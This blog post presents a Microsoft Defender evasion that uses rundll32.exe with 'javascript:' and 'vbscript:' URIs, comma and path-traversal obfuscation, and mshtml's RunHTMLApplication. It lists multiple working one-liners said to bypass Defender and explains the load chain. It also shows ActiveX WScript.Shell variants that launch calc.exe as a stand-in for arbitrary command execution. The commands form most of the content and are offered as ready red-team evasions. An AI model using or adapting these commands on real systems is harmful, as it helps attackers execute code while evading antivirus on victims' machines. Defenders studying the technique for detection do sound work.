Update: Defender Bypass using a comma • blog.network-sec

Update

Update: Microsoft was quick on updating Defender rules, the researcher @hyp3rlinx responded with this new evasion. Updated the article.

Note that this doesn’t work in Powershell, only cmd.

cmd

> rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert("Hello Red")

Original comma bypass

made by @hyp3rlinx

cmd

> rundll32.exe javascript:"\..\mshtml,,,RunHTMLApplication ";alert("Hello Red")

Bonus - my variations

made by вЯ!¢К3ժ

cmd

> rundll32.exe javascript:"..\\..\\../mshtml..\\..\\mshtml , RunHTMLApplication # ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../mshtml-..\\../../mshtml , , ,  RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../-mshtml-*-..\\../../mshtml , , ,  RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../::ms;..\\../../mshTml , , ,  RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../::lh;..\\../..\\mshTml,RunHTMLApplication ";alert("Hello Red")

They all bypass defender at the time of writing.

Both should give you a good idea on finding your own obfuscation, albeit that takes time.

Analysis - how rundll.exe can do JavaScript

I think the comma bypass is rather self-explanatory, so..

RunDll32 Process
1. Analyzes the command, determining the target DLL is: javascript:"\..\mshtml
2. Encounters an error trying to load it as an absolute directory path.
3. Unable to locate a matching file in either the current directory or any system path.
4. Does not find a corresponding manifest file javascript:"\..\mshtml.manifest for the DLL.
5. Proceeds to invoke LoadLibrary function.
LoadLibrary Function
1. Appends the .dll extension, attempting to load javascript:"\..\mshtml.dll
2. Interprets the path relatively, moving up from the simulated javascript:"\ directory.
3. Searches and successfully locates mshtml.dll in the System folder.
4. Successfully loads the DLL, with RunHTMLApplication serving as the entry function.
RunHTMLApplication Routine
1. Tries to run the script ";alert('foo');
2. Encounters syntax issues with the script and retrieves the original command line input, yielding javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');
3. Seeks to launch this URI, querying the system for the handler of the javascript protocol, commonly associated with Microsoft HTML Javascript Pluggable Protocol in the system registry.
4. Executes the script: "..\mshtml,RunHTMLApplication ";alert('foo');
Javascript Execution
1. Initiates with a string declaration, which is syntactically correct, preventing any errors.
2. Proceeds with the execution of the subsequent script components.

Pop calc

Next, let’s try and pop calc from JavaScript using the classic ActiveX - because we can. :)

cmd

> rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

Guys on twitter did a similar, yet slightly different approach:

cmd

> rundll32 vbscript:”\..\mshtml,RunHTMLApplication “+String(CreateObject(“http://Wscript.Shell”).Run(“calc.exe”),0)
> rundll32 vbscript:"\\..\\mshtml\\..\\shtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("http://Wscript.Shell").Run("calc.exe"),0)

Conclusion

rundll32.exe can do many things, amongst are executing DLL functions or running JavaScript - it’s really useful to have another evasion that’s quick and easy - my favourite. In an upcoming article we’ll discus rundll32AllTheThings, like running DLL functions, Proxy Execution killing the underlying rundll32 process after starting calc.exe and running code from the network.

Links

https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
https://www.stormshield.com/news/poweliks-command-line-confusion/

Researcher Profile

The comma bypass was found by: https://twitter.com/hyp3rlinx

All the other stuff I did myself, researching on Google / StackExchange and playing in the lab.